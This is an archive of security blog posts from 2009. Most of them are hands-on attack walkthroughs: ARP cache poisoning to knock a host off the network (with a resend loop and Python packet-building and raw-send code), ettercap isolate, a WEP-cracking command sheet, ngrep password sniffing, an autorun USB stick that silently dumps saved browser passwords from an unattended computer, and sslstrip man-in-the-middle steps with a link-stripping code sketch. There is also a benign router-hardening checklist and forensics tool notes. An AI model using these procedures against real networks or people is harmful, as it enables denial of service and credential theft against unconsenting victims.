Monday, November 30, 2009

Manually modifying a network packet, the way the pros do it

In my previous post I described using ettercap and its "isolate" plugin to take a host off the network. It poisons the victim's ARP cache so that the router's/gateway's IP address maps to the victim's own MAC address, which gives a complete denial of service (every packet bound for the gateway is delivered to the victim itself). In this post I am going to perform the same attack by a more manual method: building the malicious ARP packet by hand.

File2cable is a simple program that sends a file as a raw ethernet frame over a specified interface.

Hexedit is a simple hex editor for unix machines.

In this demo we are going to isolate a host, just like we did with ettercap and its isolate plugin.

The first thing to do is capture an "ARP reply" packet with Wireshark to use as a template. Select that frame and export its raw bytes to a file (Wireshark's "Export Selected Packet Bytes"); for this example I'll name the file "arp_reply". Open the file with hexedit (# hexedit arp_reply).

The whole trick to modifying the packet is knowing which bytes to change, so keep Wireshark and hexedit open side by side. In Wireshark, watch the hex dump pane at the bottom while you click through the packet details pane above it. Select the layer 2 frame (Ethernet II) and notice that a run of bytes is highlighted in the hex dump: those bytes are the Ethernet header. Expand the Ethernet II tree and select Destination; the highlight now covers six bytes, and they should look familiar: it is the destination MAC address. Select the other fields in the Ethernet II and Address Resolution Protocol sections and note the offset of each one in the hex dump. Wireshark is the reference that tells you which bytes to overwrite in hexedit. That is the whole idea behind hand-editing a packet.

Here is everything you need to change in hexedit. Remember that you are working in hex: every value you type is the hex representation of the field. A MAC address is already written in hex, so it needs no conversion; an IP address becomes four bytes, one per octet (the octet 192, for instance, is c0).

[Ethernet II]
Destination: the MAC address of the target host (the victim whose ARP cache we are going to poison)
Source: your own network interface's MAC address (use the real one; the switch learns the source MAC of every frame, and a bogus one can get the frame dropped)

[Address Resolution Protocol (reply)]
Leave the hardware type, protocol type, address lengths and the opcode (0002 = reply) as they are and change only the four addresses:
Sender MAC address: the target host's own MAC address (this is the value that poisons the cache)
Sender IP address: the router/gateway's IP address, in hex of course
Target MAC address: the target's MAC address
Target IP address: the target's IP address

Press ctrl+x, then Enter, to save the modified packet and exit. To test the attack, open a command prompt on the victim machine and look at its ARP cache (arp -a); make a note of the router's IP-to-MAC mapping. Next, put the packet on the wire with file2cable (# file2cable -i eth0 -f arp_reply); this also works from a wireless interface as long as the driver accepts raw frames. Now check the ARP cache on the victim again. See the difference? If browsing to websites no longer works, the attack succeeded and the machine is off the network.

Because an ARP cache entry normally expires after a few minutes, a single packet will not keep the host down for long. What we can do is write a script that resends the malicious packet every few seconds. Seconds rather than minutes, because the router may send an ARP request to the victim at any time, and when the victim answers it also learns the requester's correct IP-to-MAC mapping, which undoes our poisoning. The script looks like this:


while true; do
    file2cable -i eth0 -f arp_reply
    sleep 10
done

The above script resends the frame every 10 seconds; stop it with ctrl+c.
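To make the byte offsets concrete, here is an added example (my own code, not part of the original post) that builds the same ARP reply in Python that the post assembles by hand in hexedit, parses it back into the fields Wireshark shows, and can put it on the wire the way file2cable does. The MAC and IP addresses under __main__ are constructed placeholders, and send_frame assumes a Linux host with root privileges.

```python
import socket
import struct

# Added example (not from the post): build the ARP reply the post assembles
# by hand in hexedit, so the byte offsets of every field become obvious.
# The MAC/IP addresses in __main__ are constructed placeholders.

ETHERTYPE_ARP = 0x0806
ARP_OP_REPLY = 2                 # opcode 1 would be a request
ARP_FORMAT = "!HHBBH6s4s6s4s"    # 28-byte ARP body for Ethernet/IPv4


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes; MACs are already hex, no conversion."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(eth_dst, eth_src, sender_mac, sender_ip, target_mac, target_ip):
    """Return a 42-byte Ethernet II + ARP reply frame.

    Poisoning layout from the post: eth_dst, target_mac and target_ip are the
    victim; sender_ip is the gateway's IP; sender_mac is the victim's OWN MAC,
    so the victim maps the gateway to itself; eth_src is the attacker's NIC.
    """
    ethernet = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(eth_src), ETHERTYPE_ARP)
    arp = struct.pack(
        ARP_FORMAT,
        1,                              # hardware type: Ethernet
        0x0800,                         # protocol type: IPv4
        6,                              # hardware address length
        4,                              # protocol address length
        ARP_OP_REPLY,
        mac_bytes(sender_mac),
        socket.inet_aton(sender_ip),    # the IP "in hex of course": one byte per octet
        mac_bytes(target_mac),
        socket.inet_aton(target_ip),
    )
    return ethernet + arp


def parse_arp(frame):
    """Decode a frame back into the fields Wireshark shows; use it to verify an edit."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame (ethertype 0x%04x)" % ethertype)
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack(ARP_FORMAT, frame[14:42])
    return {
        "eth_dst": fmt_mac(eth_dst), "eth_src": fmt_mac(eth_src), "opcode": op,
        "sender_mac": fmt_mac(smac), "sender_ip": socket.inet_ntoa(sip),
        "target_mac": fmt_mac(tmac), "target_ip": socket.inet_ntoa(tip),
    }


def offsets():
    """Byte offsets of the fields you overwrite in hexedit (Ethernet header = 14 bytes)."""
    return {"eth_dst": 0, "eth_src": 6, "opcode": 20, "sender_mac": 22,
            "sender_ip": 28, "target_mac": 32, "target_ip": 38}


def send_frame(iface, frame):
    """Linux only, needs root; the same thing 'file2cable -i iface -f file' does."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed addresses: victim 00:11:22:33:44:55 / 192.168.1.50,
    # gateway 192.168.1.1, attacker NIC 66:77:88:99:aa:bb.
    frame = build_arp_reply(
        eth_dst="00:11:22:33:44:55", eth_src="66:77:88:99:aa:bb",
        sender_mac="00:11:22:33:44:55", sender_ip="192.168.1.1",
        target_mac="00:11:22:33:44:55", target_ip="192.168.1.50")
    with open("arp_reply", "wb") as f:      # the file you would hand to file2cable
        f.write(frame)
    print(frame.hex())
    print(parse_arp(frame))
```

Running the script writes an arp_reply file you can open in hexedit to compare against the offsets() table; the sender IP, for instance, always starts at byte 28 (0x1c). Feed the file to file2cable, or call send_frame("eth0", frame) as root, to put it on the wire.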

Here is a quick visual of an ARP cache poisoning attack that uses hexedit and Wireshark to capture and modify an ARP packet:
It should give you a visual idea of what to change when using Wireshark and hexedit together. Note, however, that they perform a different attack from the one demonstrated here. Once you have my example covered, try theirs next to get a good feel for things.

Resources/Good reading:

Take down any host on a network using Ettercap's plugin Isolate

Ettercap is a very popular password sniffer and packet analyzer. It ships with many plugins, including isolate, which I am going to discuss briefly here. This plugin lets you literally take a host off the network. For example, if you find a user using the internet for malicious purposes, why not just take him out? The attack works by poisoning the user's ARP cache. A computer on your LAN that talks to the internet relies on knowing the MAC address of the gateway or router, so it is not hard to imagine what happens if we tell that machine that to reach the internet it should send all its packets to a different MAC address. More interesting still: if we poison the machine's ARP cache so that the router's IP address maps to that computer's own MAC address, the result is a complete denial of service. Whenever that user's machine tries to communicate with the web, all its packets are sent to its own MAC address. Talk about a state of confusion.

This attack may take up to 5 minutes to take effect, because it relies on the victim's ARP cache entry for the gateway timing out and being refreshed.

# ettercap -Tq -i eth0 -P isolate / //

The above command takes the host completely down. On the Windows victim, run ipconfig /all and arp -a and compare the machine's own MAC address with the one now listed for the gateway. If they are the same, you just pwned that machine. Now you can tell those pesky torrent hogs just before you take them down, "Say hello to my lil friend"... Isolate.

Resources/Good reading:

Cracking WEP with aircrack-ng ( cheat sheet)

We should all by now be aware of the well-known weaknesses of WEP. WEP encrypts each frame with RC4 keyed by the secret key plus a 24-bit initialization vector (IV) that is sent in the clear; the IV space is tiny, some IVs are statistically weak, and the plaintext of certain packets (an ARP request, for example) is predictable, so enough captured IVs let a tool like aircrack-ng recover the key. The idea behind the attack is therefore to capture enough packets for aircrack-ng to analyse the IVs and derive the WEP key. We will use the aircrack-ng suite of tools. Please perform this attack only on your own network, or on networks you have explicit permission to audit.

[Cheat sheet] using BackTrack 4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your MAC address to a random one
# ifconfig wlan0 up //bring the wireless interface back up
# airmon-ng start wlan0 //create an interface (mon0) in monitor mode
# airodump-ng mon0 //survey the air for potential WEP targets
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_targetAP" -w wep mon0 //capture only the target's packets; airodump-ng writes them to wep-01.cap
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //fake-authenticate to the access point so it accepts the frames we inject
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "connected_client_mac_address" mon0 //send deauth frames to knock a client off the AP; when it reconnects it usually sends an ARP request we can replay
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -3 mon0 //ARP replay attack: re-inject captured ARP requests so the AP generates fresh IVs quickly
# aircrack-ng -b "mac_address_of_targetAP" wep-01.cap //once enough IVs are captured (tens of thousands for the PTW attack, considerably more for the older KoreK method), attempt to recover the WEP key

That's it.
Please use google to find out more information about the insecurities of WEP.

Saturday, November 28, 2009


Ngrep is a basic packet sniffer whose main feature is the ability to filter network packets by searching (grep-ing) their payloads for a string or regular expression and displaying the matching packets' content in readable form. Think of it as unix grep applied to network traffic. Ngrep uses standard tcpdump/BPF filters: host, port 80, etc.


# ngrep -d eth0 port 80 // displays all port 80 traffic on interface eth0

# ngrep -d eth0 "" port 80 // an empty pattern matches every packet, so this shows all port 80 payloads

# ngrep -d eth0 "." port 80 // the pattern is a regular expression; "." matches any byte (a bare "*" is not a valid expression)

For better visual output add "-W byline" option

# ngrep -d eth0 -W byline "" port 80

To search for more than one string

# ngrep -d eth0 -W byline -i "pass|USER" -n 2 port 80 // searches for 'pass' or 'USER'. "-i" ignores case. "-n 2" matches only 2 packets (any number can be given), then exits.

# ngrep -n 2 -q -d eth0 -W byline -wi "pass|USER" port 80 // the same search; "-w" matches the expression only as a whole word, and "-q" (quiet) prints nothing but the matching packets' headers and payloads.

The following can parse for logins to gain passwords:

# ngrep -d eth0 -W byline -i "pass|USER" port 80 |grep pass

More examples, mimicked from:

Usage examples:
ngrep '' udp (print all UDP packets)
ngrep '' icmp (print all ICMP packets)
ngrep '' port 53 (print TCP or UDP port 53 packets)
ngrep '' tcp port 23 (print TCP port 23 packets)
ngrep 'LILWORLD' port 138 (print Microsoft browsing traffic for NT domain LILWORLD)
ngrep -iq 'rcpt to|mail from' tcp port 25 (monitor current delivery and print sender and recipients)
ngrep 'user' port 110 (monitor POP3)
ngrep -q 'abcd' icmp (Microsoft operating systems fill the ICMP payload with the alphabet; is the "pinging" host running a Microsoft operating system?)
ngrep -iq 'user-agent' tcp port 80 (determine client application that client host is running)
ngrep '220' port 21 (determine version of FTP server)
ngrep 'SSH' port 22 (investigate Secure Shell)
ngrep -v '' port 23 (see all traffic but telnet)

Resources/Good reading:

Friday, November 27, 2009

HTTPtunnel, Another way to tunnel your traffic to bypass firewalls

As the title says, httptunnel lets you create a tunnel (an unencrypted one, I might add) so you can redirect ports or bypass firewalls by wrapping traffic in HTTP requests. It is not the most preferred way to tunnel traffic, since it has no encryption to keep your activity hidden the way SSH tunnelling or stunnel would. Nevertheless it is an easy utility to get running quickly, and it works on both Linux and Windows.


On the server [linux]:
For this you need some service running locally. We will use a web server on port 80. Start the web server and put a demo index.html in its document root so clients are greeted with a page. Then run the httptunnel server (hts) as follows:
# ./hts -F 4444 //Listens on port 4444 and forwards all traffic it receives to the local web server on port 80 (the -F argument names that host:port)

On the client [windows]:

c:\>htc.exe -F 5555 //Listens on port 5555 and connects to the waiting httptunnel server on port 4444

Now open a web browser on the client and point it at the local port htc is listening on (5555). If everything works, you should be greeted with the web page served on the Linux machine.

Resources/Good reading:


Foremost is a very popular tool in the open-source forensics world. It can recover files from practically anything: hard disks, disk images, pcap network captures and RAM dumps. Unfortunately, due to implementation limits, earlier versions of foremost could only process files smaller than 2 GB; version 0.69 raised the maximum carve size to 4 GB. Foremost served as the basis for other file carving tools such as scalpel and tcpxtract. The program uses a configuration file (foremost.conf) that specifies the headers and footers to search for and carve out.

foremost.conf comes with preconfigured headers and footers for well-known file types. You are not limited to what is there by default: you can add your own headers and footers, or write a custom config file.

# foremost -i file.img -t doc -o /root/Foremost_Dir -c /etc/foremost.conf

'-i': input file (image). A drive or partition can be given as well, e.g. /dev/sda1
'-o': directory to write the recovered files to
'-t': type of file to search for. The default is to search for all file types known in its config file.
'-c': [optional] config file to use. If left out, foremost uses its default config file at /etc/foremost.conf

[Supported file types out the box]['-t']

As mentioned earlier, scalpel is based on foremost; it is more efficient and faster, and foremost's authors have recommended that practitioners use scalpel instead.
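To show what foremost's header/footer carving actually does, here is an added example (my own code, not foremost's or scalpel's) with a minimal carver driven by rules shaped like foremost.conf lines. The JPEG and PNG signatures are the real ones; the blob it runs over is constructed inline and includes a JPEG whose footer never arrives, which is the case a carver has to handle without losing the file.

```python
import os

# Added example (not foremost's own code): a minimal header/footer carver of
# the kind foremost.conf describes, run over a constructed byte blob.

# (extension, case_sensitive, max_size, header, footer): the same five fields
# a foremost.conf line carries. The signatures are real JPEG/PNG magic bytes.
CARVE_RULES = [
    ("jpg", True, 10_000_000, b"\xff\xd8\xff", b"\xff\xd9"),
    ("png", True, 10_000_000, b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
]


def carve(blob, rules=CARVE_RULES):
    """Return a list of (extension, offset, data) for every header found.

    As foremost does, each hit is bounded by max_size and the footer is kept
    with the file; if no footer turns up inside the window, the whole window
    is taken so a truncated file is still recovered.
    """
    found = []
    for ext, _case_sensitive, max_size, header, footer in rules:
        pos = blob.find(header)
        while pos != -1:
            window = blob[pos:pos + max_size]
            end = window.find(footer, len(header))
            data = window if end == -1 else window[:end + len(footer)]
            found.append((ext, pos, data))
            pos = blob.find(header, pos + len(data))
    return sorted(found, key=lambda hit: hit[1])


def carve_to_dir(blob, outdir, rules=CARVE_RULES):
    """Write each hit as <offset>.<ext>, the naming foremost uses in its output directory."""
    os.makedirs(outdir, exist_ok=True)
    names = []
    for ext, offset, data in carve(blob, rules):
        name = os.path.join(outdir, "%08d.%s" % (offset, ext))
        with open(name, "wb") as f:
            f.write(data)
        names.append(name)
    return names


def sample_image():
    """Constructed disk-image fragment: filler, a tiny 'JPEG', more filler,
    a tiny 'PNG', then a JPEG header whose footer never arrives."""
    jpeg = b"\xff\xd8\xff\xe0" + b"JFIF-PAYLOAD" + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR...IDAT..." + b"IEND\xaeB`\x82"
    truncated = b"\xff\xd8\xff\xe1" + b"EXIF-no-footer"
    return b"\x00" * 64 + jpeg + b"\xaa" * 100 + png + b"\x00" * 32 + truncated


if __name__ == "__main__":
    for ext, offset, data in carve(sample_image()):
        print("%s at offset %d, %d bytes" % (ext, offset, len(data)))
```

The max_size field is what keeps a missing footer from swallowing the rest of the image, and it is the value you tune in foremost.conf when a file type is being cut short or over-extended.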

Resources/Good reading:

10 Steps to securing a wirless router, by synjunkie

I got this from another blog and I find the information very helpful and comprehensive. It doesn't teach you or show you how to configure your routers, but it tells you the things that you should know and check for when setting up your own wireless router. Therefore you can use this as your checklist, if you will, to avoid getting pwned by your inquisitive neighbours.

The following was taken from synjunkies blog:

1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in as well with the firmware upgrade. It's also a good idea to check the vendor's site every couple of months for updates.

2. Change the default Password


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.

4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can be cracked in seconds. Ensure that whatever encryption you use it has a long random key. There are plenty of random key generators available so use them.

5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique but not something that identifies it as your network, such as “Bob Scratchets House”. Even after hiding the SSID it is possible for an attacker to view it but it is another layer in your defense strategy.

6. Apply MAC Address Filtering

Each device that has a wireless card in will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect using wireless to you router. This can be bypassed but it's another hurdle to make a potential attacker jump through.

7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. By disabling UPnP you will need to enable port forwarding when required.

8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also by limiting the amount of addresses to the number of hosts you have it might provide an early warning system if someone does manage to bypass your security and hop onto your wireless LAN.

9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise their free services. OpenDNS can be used to block specific types of sites such as File Sharing or Pornography and also to log where computers from your LAN are going to. It will also block your computer from visiting known bad sites. Another important note, when the DNS flaw was released to the public by Dan Kaminsky at Blackhat 08, OpenDNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.

10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!

The functions I have raised in these 10 steps are those that should be available on most consumer grade routers. If you have a router that does have more functionality such as allowing you to use HTTPS to access the administrative interface then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure such as in a Truecrypt volume or in an encrypted disk image.


Very interesting and informative checklist. The closing sentences do add some complexity with storing config files on TrueCrypt volumes or encrypted disk images. Although it's a good practice (and most likely mandatory) for high-security environments, the average user doesn't and most likely wouldn't be too concerned about backing up his config files in secure locations. They probably know what encryption is but don't know how to use it to their own benefit and probably wouldn't worry about the hassle to learn. But for those that might be interested in learning about encrypting their data, I'm going to do a post on TrueCrypt in the near future, showing you how you can encrypt your data/router configs in an encrypted volume.

Resources/Good reading:

Rinetd, redirector

This program seems to be losing some of its buzz but is still noteworthy in my opinion. It is not a complex program to use or learn. Its main function is to redirect TCP connections from one IP address and port to another. It can handle any number of connections to the address/port pairs specified in its config file, /etc/rinetd.conf. Rinetd cannot redirect FTP, because FTP requires more than one socket (the data connection is opened separately).

Typical Forwarding rule in rinetd.conf:
bindaddress bindport connectaddress connectport

For example: 80 80

would redirect all connections to port 80 of the public IP address to port 80 of the internal address, which would typically be a machine behind the firewall with no direct route to the outside world. This rule only answers on the one interface connected to the outside (the ethernet card connected to the modem). If the server has several interfaces it is sometimes preferable to answer on all of them, which is what binding to the wildcard address does:

 80 80

would redirect all connections to port 80 on every IP address assigned to the server.

You can also allow and deny specific clients, or whole subnets, from using the redirector. The '?' wildcard matches any one character, and '*' matches any number of characters, including zero.

allow // allow one specific address
allow // allow a range of addresses matching the pattern
allow 201.21.21.* // allow the whole class C network, 201.21.21.0-255

After you have customized your config file, to run the server run:

# rinetd

If you have a few custom config files you can specify which one to use.

# rinetd -c /etc/my_custom_config.conf

Logs are useful, and by default rinetd doesn't produce any. To enable logging, add the following line to the configuration file:

logfile logfile_location


logfile /var/log/rinetd.log

By default, rinetd logs in a simple tab-delimited format containing the following information:
Date and time
Client address
Listening host
Listening port
Forwarded-to host
Forwarded-to port
Bytes received from client
Bytes sent to client
Result message
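As an added example (my own code, not rinetd's), here is a small redirector that reads the same config syntax described above, applies allow/deny rules with the '?' and '*' wildcards, and splices permitted TCP connections to their destination. The config text is constructed for the demo and its addresses are placeholders; the rule scoping (allow/deny lines before the first forwarding rule are global, lines after a rule apply only to that rule) and the "deny wins, allow list is a whitelist" logic follow rinetd's documented behaviour, but check the man page of your version before relying on them.

```python
import re
import socket
import threading

# Added example (not rinetd's own code): parse a rinetd.conf-style file,
# apply its allow/deny wildcard rules, and forward TCP connections the way
# rinetd does. SAMPLE_CONF below is constructed for the demo.


class Forward:
    def __init__(self, bind_addr, bind_port, connect_addr, connect_port):
        self.bind_addr, self.bind_port = bind_addr, int(bind_port)
        self.connect_addr, self.connect_port = connect_addr, int(connect_port)
        self.allow, self.deny = [], []   # rules that follow this line in the file


def pattern_to_regex(pattern):
    """rinetd pattern syntax: '?' matches one character, '*' any run (even empty)."""
    body = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile("^" + body + "$")


def matches_any(ip, patterns):
    return any(pattern_to_regex(p).match(ip) for p in patterns)


def parse_config(text):
    """Return (forwards, global_allow, global_deny, logfile).

    allow/deny lines before the first forwarding rule are global; lines
    after a forwarding rule apply to that rule only.
    """
    forwards, global_allow, global_deny, logfile = [], [], [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # '#' starts a comment
        if not line:
            continue
        parts = line.split()
        if parts[0] in ("allow", "deny"):
            target = forwards[-1] if forwards else None
            if parts[0] == "allow":
                (target.allow if target else global_allow).append(parts[1])
            else:
                (target.deny if target else global_deny).append(parts[1])
        elif parts[0] == "logfile":
            logfile = parts[1]
        elif len(parts) == 4:
            forwards.append(Forward(*parts))
        else:
            raise ValueError("unrecognised rinetd.conf line: %r" % raw)
    return forwards, global_allow, global_deny, logfile


def client_permitted(ip, fwd, global_allow, global_deny):
    """A matching deny always wins; if an allow list exists the client must match it."""
    if matches_any(ip, global_deny) or matches_any(ip, fwd.deny):
        return False
    if global_allow and not matches_any(ip, global_allow):
        return False
    if fwd.allow and not matches_any(ip, fwd.allow):
        return False
    return True


def pump(src, dst):
    """Copy bytes one way until EOF, then shut both sockets down."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def serve(fwd, global_allow, global_deny):
    """Accept on bind_addr:bind_port and splice permitted clients to connect_addr:connect_port."""
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((fwd.bind_addr, fwd.bind_port))
    listener.listen(16)
    while True:
        client, (ip, _port) = listener.accept()
        if not client_permitted(ip, fwd, global_allow, global_deny):
            client.close()          # rinetd would log this as a denied connection
            continue
        upstream = socket.create_connection((fwd.connect_addr, fwd.connect_port))
        threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pump, args=(upstream, client), daemon=True).start()


SAMPLE_CONF = """\
# constructed rinetd.conf for this example (addresses are placeholders)
logfile /var/log/rinetd.log
allow 192.168.1.*
deny 192.168.1.13
0.0.0.0 80 10.0.0.5 80
0.0.0.0 2222 10.0.0.5 22
allow 192.168.1.1?
"""

if __name__ == "__main__":
    forwards, ga, gd, log = parse_config(SAMPLE_CONF)
    for fwd in forwards:
        threading.Thread(target=serve, args=(fwd, ga, gd), daemon=True).start()
    threading.Event().wait()       # run until killed
```

With that config, 192.168.1.20 may reach the port 80 rule but not the port 2222 rule (whose own allow line only admits 192.168.1.10-19), and 192.168.1.13 is refused everywhere because the global deny takes precedence.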

Thursday, November 26, 2009

USB Hack

There are many USB hacks on the web, each with its own abilities and purposes. The idea is to abuse the autorun feature that most Windows systems have enabled: when you plug in a USB stick (one capable of autorun, see U3 drives), it can automatically run a program or script. This means that you can be in a coffee shop, turn around to buy a coffee and leave your computer unattended for a minute, and in that time a malicious user can plug his thumb drive into your system for five seconds and walk off with valuable information such as saved passwords and browser history. That's it: five seconds and you are pwned.

This project is mostly used on customizable U3 drives, but it can be made to work with a regular thumb drive with one difference: it is not fully automatic. When you plug the drive in you are prompted with an AutoPlay dialog, and a click on its 'Open' button runs your script or executable. For our demo we use a regular thumb drive to simulate the attack, on Windows.

Files you would need:
[nircmd.exe] :
[iepv.exe] :
[drive.ico]: Just an icon that I used. Use any icon and rename it drive.ico

Open up notepad, type the following and save the file as Autorun.inf (the [autorun] section header is required, or Windows ignores the file):

[autorun]
OPEN=nircmd.exe execmd iepv.exe /stext ievh.txt
ACTION=Start my application
ICON=drive.ico

Copy iepv.exe, nircmd.exe, drive.ico and Autorun.inf to a freshly formatted thumb drive and you are finished. Autorun.inf causes the prompt to appear when you plug the drive into a Windows system. nircmd.exe is a handy multi-purpose command-line utility that we use to run iepv.exe silently (its execmd command hides the console window that would otherwise pop up for a command-line tool). iepv.exe (NirSoft's IE PassView) is a small utility that does one thing well: dump the passwords Internet Explorer has saved; the /stext switch writes them to the named text file.

To execute the attack (if you haven't figured it out already), plug the USB drive into a Windows system. An autorun popup appears asking you to open the drive; click Open and iepv.exe does its job in the background. Within five seconds you can unplug the drive and take it with you. Back on your own machine there will be a text file, ievh.txt, on the thumb drive listing what was collected from the target. This method can be extended with scripts and other executables; I'll leave some examples in the resources section.

Resources/Good reading:

Attack on SSL with SSLstrip

There is a lot of controversy around this tool, mainly because of how many users it can quietly compromise. Yes, this tool is serious business. I was reading the author's (Moxie Marlinspike) page on sslstrip and read that the research he published got his PayPal account suspended. He presented the work at Black Hat 2009, one of the world's best-known hacker conferences, with statistics on the over 500 users whose credentials he captured, including passwords and credit card numbers. The most important point of those stats was that none of those users knew they had been pwned. It was completely transparent to them.

This tool does not perform the generic man-in-the-middle attack on SSL that tools such as ettercap or Cain & Abel do. Those rely on the user accepting a forged certificate in their browser, which many still do. With sslstrip the wow factor is that the attack is almost entirely transparent to the average user. In the author's words, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". Version 0.5 added modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

There is a decent explanation of how it works on the author's website, which I am going to mostly follow, with minor changes for clarity.


  • Python >= 2.4 (apt-get install python)
  • The python "twisted-web" module (apt-get install twisted-web)
Or, if you have BackTrack 4 like I do, you don't need to worry about the above.


  • # tar zxvf sslstrip-0.5.tar.gz //extract the compressed archive
  • # cd sslstrip-0.5
  • (Optional) # sudo python ./ install //installs to the appropriate directories. Not necessary; it runs out of the box.

Running sslstrip

  • Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Set up iptables to redirect HTTP traffic to the port sslstrip will listen on. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
  • Run ettercap to ARP-spoof the victim and the gateway so their traffic passes through you; ettercap also sniffs passwords on the fly and displays them in real time. (# ettercap -Tq -i eth0 -M ARP:remote / /10.00.1/)
  • Run sslstrip, listening on the same port the iptables rule redirects to. (# -l )

That's all there is to it. To test it, from the victim go to a site like Facebook and log in with some credentials (correct or incorrect), then look at ettercap's output. Notice anything confidential about yourself that Facebook and no one else should know? Ahh.
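To make the "map those links into look-alike HTTP links" part concrete, here is an added example (my own code, not sslstrip's) showing the core rewrites a stripping proxy performs on the server-to-victim side and how it decides, on the victim-to-server side, to speak HTTPS upstream for a URL it previously downgraded. The login page, redirect and cookie it works on are constructed inline; the real tool additionally keys this state per client and does the favicon trick, which is not shown.

```python
import re

# Added example (not sslstrip's own code): the two halves of the stripping
# trick, run on constructed HTTP responses so the rewrites can be checked.

HTTPS_LINK = re.compile(r"https://([^\s\"'<>]+)")
SECURE_FLAG = re.compile(r";\s*secure", re.IGNORECASE)


class Stripper:
    """Sits between victim and server as a plain HTTP proxy, after ARP spoofing
    and the iptables REDIRECT have delivered the victim's port-80 traffic to it."""

    def __init__(self):
        self.stripped = set()   # host/path values the victim has only ever seen as http://

    def rewrite_body(self, body):
        """Server -> victim: every https:// link becomes http://, and is remembered."""
        def downgrade(match):
            self.stripped.add(match.group(1))
            return "http://" + match.group(1)
        return HTTPS_LINK.sub(downgrade, body)

    def rewrite_headers(self, headers):
        """Server -> victim: downgrade redirects to https and drop the cookie
        'secure' flag so the browser will send the cookie over plain HTTP."""
        out = {}
        for name, value in headers.items():
            key = name.lower()
            if key == "location" and value.startswith("https://"):
                value = self.rewrite_body(value)
            elif key == "set-cookie":
                value = SECURE_FLAG.sub("", value)
            out[name] = value
        return out

    def upstream_scheme(self, host, path):
        """Victim -> server: if we stripped this URL, fetch it over HTTPS ourselves
        so the server sees a normal SSL client; otherwise plain HTTP."""
        return "https" if host + path in self.stripped else "http"


def demo():
    """Constructed login page and redirect, as a server would send them."""
    s = Stripper()
    page = ('<a href="https://bank.example/login">Log in</a> '
            '<a href="http://bank.example/help">Help</a>')
    headers = {"Location": "https://bank.example/account",
               "Set-Cookie": "sid=abc123; secure; HttpOnly"}
    return s, s.rewrite_body(page), s.rewrite_headers(headers)


if __name__ == "__main__":
    s, body, hdrs = demo()
    print(body)
    print(hdrs)
    print("GET /login ->", s.upstream_scheme("bank.example", "/login"))
```

The victim's browser never sees an https:// link or a certificate, so there is no warning to click through; the server, meanwhile, sees a perfectly ordinary TLS session from the attacker. The defence that later closed this hole is HTTP Strict Transport Security (browser-side memory, or a preload list, that a host is HTTPS-only), which is exactly why stripping the Strict-Transport-Security header on the first visit is not enough against a preloaded host.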

Here's a nice video by John Strand demonstrating this attack:

SSLStrip from John Strand on Vimeo.

Resources/Good reading:

Cracking passwords with John the Ripper

John the Ripper is a free, fast and portable password cracker. It runs on more than ten platforms including Linux/Unix, DOS and Windows, and supports many hash formats: Unix crypt flavours (DES-, MD5- and Blowfish-based), Kerberos AFS, and Windows NT/2000/XP/2003 LM hashes.

Attack types: dictionary and brute force (John calls the latter "incremental" mode)

Taken from Wikipedia:

One of the modes John can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the encrypted hashes.

